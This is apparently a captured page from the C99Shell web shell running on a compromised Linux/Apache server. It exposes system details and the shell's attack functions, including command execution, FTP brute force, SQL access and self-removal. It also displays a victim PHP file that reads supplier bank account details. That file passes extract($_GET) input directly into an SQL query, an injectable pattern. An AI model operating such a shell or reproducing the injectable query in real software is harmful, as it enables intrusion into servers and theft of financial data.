!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/admin/contas/   drwxr-xr-x
Free 9.43 GB of 93.48 GB (10.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     conta_busca_dados_fornecedor.php (1.55 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
include("../../config/config.php");
    include(
INCLUDES "inc_Conexao.php");
    include(
INCLUDES "inc_Funcoes.php");
    include(
INCLUDES "valida_usuario.inc.php");
    
    
extract($_GET);
    
    
$sql "
        SELECT
            FOR_Banco_DR, FOR_AgenciaNum, FOR_AgenciaDV, FOR_ContaNum, FOR_ContaDV,
            BAN_Nome
        FROM FUN_Fornecedores
            INNER JOIN FUN_Bancos ON BAN_RowID = FOR_Banco_DR
        WHERE FOR_RowID = 
$id
    "
;
    
$rsFornecedor executa($sql);
    if (!empty(
$rsFornecedor)) {
        foreach(
$rsFornecedor as $rsFornecedor) {
            
extract($rsFornecedor);
            
?>
            <table width="100%" style="margin-left: 48px;">
                <tr>
                     <td width="120" align="right">Banco:</td><td>&nbsp;<input name="CON_BancoNome" type="text" id="CON_BancoNome" value="<?= $BAN_Nome?>" size="50" /></td>
                </tr>
                <tr>
                    <td align="right">AgĂȘncia:</td><td>&nbsp;<input name="CON_AgenciaNum" type="text" id="CON_AgenciaNum" size="10" value="<?= $FOR_AgenciaNum?>"> 
                      - 
                        <input name="CON_AgenciaDV" type="text" id="CON_AgenciaDV" size="3" value="<?= $FOR_AgenciaDV?>"></td>
                </tr>
                <tr>
                    <td align="right">Conta:</td><td>&nbsp;<input name="CON_ContaNum" type="text" id="CON_ContaNum" size="10" value="<?= $FOR_ContaNum?>"> 
                      - 
                        <input name="CON_ContaDV" type="text" id="CON_ContaDV" size="3" value="<?= $FOR_ContaDV?>"></td>
                </tr>
            </table>
            <?php
        
}
    }
    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0034 ]--